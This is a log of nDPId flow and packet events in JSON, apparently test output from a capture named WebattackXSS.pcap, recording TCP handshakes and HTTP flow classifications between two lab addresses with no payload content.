+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":3,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DoFAAD4Gt1esEAABwKgKMomWAFBGnvpDisSvQoAQAOU6AQAAAQEICgE89MID5sY2"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348030687,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348030687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gAJAAD4GRc6sEAABwKgKMomkAFDF6nYHAAAAAKACchCh2wAAAgQFtAQCCAoBPPYFAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":2,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiaQ\/ByIUxep2CKAScSB2PwAAAgQFtAQCCAoD5sd5ATz2BQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":3,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gANAAD4GRdWsEAABwKgKMomkAFDF6nYIPwciFYAQAOUVRwAAAQEICgE89gUD5sd5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348033296,"flow_last_seen":1499348033296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348033296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1499348033296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LtJAAD4Glv6sEAABwKgKMom+AFA+iNZDAAAAAKACchDGWwAAAgQFtAQCCAoBPPiRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8830,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":2,"flow_last_seen":1499348033297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033297,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQib4da6BXPojWRKAScSA7jAAAAgQFtAQCCAoD5soFATz4kQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":3,"flow_last_seen":1499348033297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348033297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LtNAAD4GlwWsEAABwKgKMom+AFA+iNZEHWugWIAQAOXakwAAAQEICgE8+JED5soF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348034569,"flow_last_seen":1499348034569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348034569,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1499348034569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z7RAAD4G9husEAABwKgKMonMAFCoJTZ7AAAAAKACchD7OgAAAgQFtAQCCAoBPPnPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":2,"flow_last_seen":1499348034569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiczTsUb+qCU2fKAScSASQAAAAgQFtAQCCAoD5stDATz5zwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":3,"flow_last_seen":1499348034570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348034570,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z7VAAD4G9iKsEAABwKgKMonMAFCoJTZ807FG\/4AQAOWxRgAAAQEICgE8+dAD5stD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348037175,"flow_last_seen":1499348037175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348037175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1499348037175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MahAAD4GlCisEAABwKgKMonmAFDKJM3zAAAAAKACchA\/HQAAAgQFtAQCCAoBPPxbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":2,"flow_last_seen":1499348037175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiebQGLVtyiTN9KAScSDovwAAAgQFtAQCCAoD5s3PATz8WwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":3,"flow_last_seen":1499348037176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348037176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MalAAD4GlC+sEAABwKgKMonmAFDKJM300Bi1boAQAOWHxwAAAQEICgE8\/FsD5s3P"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348038438,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348038438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/dAAD4GNdmsEAABwKgKMon0AFAYNXJgAAAAAKACchBLVgAAAgQFtAQCCAoBPP2XAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":2,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQifSSwJxVGDVyYaAScSBKLgAAAgQFtAQCCAoD5s8KATz9lwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":3,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/hAAD4GNeCsEAABwKgKMon0AFAYNXJhksCcVoAQAOXpNQAAAQEICgE8\/ZcD5s8K"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 